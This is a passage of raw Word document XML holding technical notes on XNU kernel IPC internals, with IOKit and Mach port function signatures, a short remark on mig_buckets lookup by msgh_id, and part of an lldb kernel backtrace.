          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_port_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iokit_make_connect_port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>io_object_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0092285C" w:rsidRDefault="00F2501D" w:rsidP="0092285C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_port_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iokit_port_for_object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>io_object_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_kobject_type_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0092285C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F726B" w:rsidRDefault="0092285C" w:rsidP="0092285C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IOMachPort</w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IOMachPort</w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>portForObject</w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OSObject</w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>                </w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_kobject_type_t</w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="005F726B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0092285C" w:rsidRDefault="0069634B" w:rsidP="0092285C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="840" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D396C" w:rsidRPr="00BD3E41" w:rsidRDefault="00C425CD" w:rsidP="007D396C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mach_port_kobject </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00981EAC" w:rsidRDefault="00C425CD" w:rsidP="00CF63B0">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="264"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C425CD" w:rsidRDefault="00C425CD" w:rsidP="00C425CD">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>kern_return_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_port_kobject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_space_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_port_name_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>natural_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>object_type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_vm_address_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>object_addr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C425CD" w:rsidRPr="00C425CD" w:rsidRDefault="00C425CD" w:rsidP="00CF63B0">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="264"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00155225" w:rsidRPr="005E36D3" w:rsidRDefault="005E36D3" w:rsidP="005E36D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="150" w:name="_Toc445313352"/>
      <w:r w:rsidRPr="005E36D3">
        <w:t>mig_buckets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="150"/>
    </w:p>
    <w:p w:rsidR="005E36D3" w:rsidRDefault="005E36D3" w:rsidP="005E36D3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(kernel)ipc_kobject_server</w:t>
      </w:r>
      <w:r w:rsidR="006100CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E36D3" w:rsidRDefault="005E36D3" w:rsidP="005E36D3">
      <w:r w:rsidRPr="005E36D3">
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\osfmk\kern\ipc_kobject.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E36D3" w:rsidRPr="005E36D3" w:rsidRDefault="005E36D3" w:rsidP="005E36D3"/>
    <w:p w:rsidR="00B25045" w:rsidRDefault="005E36D3" w:rsidP="00B25045">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="68"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="68"/>
        </w:rPr>
        <w:t xml:space="preserve">ipc_kobject_server finds </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="68"/>
        </w:rPr>
        <w:t>mig_hash_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="68"/>
        </w:rPr>
        <w:t xml:space="preserve"> structure in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="68"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="68"/>
        </w:rPr>
        <w:t>mig_buckets</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="68"/>
        </w:rPr>
        <w:t xml:space="preserve"> according to msgh_id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00104EAF" w:rsidRDefault="00104EAF" w:rsidP="00B25045">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="68"/>
        </w:rPr>
      </w:pP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5: 0xffffff801b163750 kernel.development`_Xio_connect_method(InHeadP=&lt;unavailable&gt;, OutHeadP=0xffffff80388bd5d0) + 384 at device_server.c:8255 [opt]</w:t>
      </w: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6: 0xffffff801b092963 kernel.development`ipc_kobject_server(request=0xffffff8038ce6c00) + 259 at ipc_kobject.c:339 [opt]</w:t>
      </w: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7: 0xffffff801b06e6f3 kernel.development`ipc_kmsg_send(kmsg=&lt;unavailable&gt;, option=&lt;unavailable&gt;, send_timeout=0) + 195 at ipc_kmsg.c:1440 [opt]</w:t>
      </w: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8: 0xffffff801b085035 kernel.development`mach_msg_overwrite_trap(args=&lt;unavailable&gt;) + 197 at mach_msg.c:470 [opt]</w:t>
      </w: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9: 0xffffff801b189cc0 kernel.development`mach_call_munger64(state=0xffffff802f7c9880) + 480 at bsd_i386.c:560 [opt]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00104EAF" w:rsidRPr="00104EAF" w:rsidRDefault="00104EAF" w:rsidP="001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3"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00104EAF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #10: 0xffffff801b1bf436 kernel.development`hndl_mach_scall64 + 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00104EAF" w:rsidRPr="00104EAF" w:rsidRDefault="00104EAF" w:rsidP="00104EAF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00104EAF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(lldb)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00104EAF" w:rsidRDefault="00104EAF" w:rsidP="00B25045">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00104EAF" w:rsidRPr="005E36D3" w:rsidRDefault="00104EAF" w:rsidP="00B25045">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
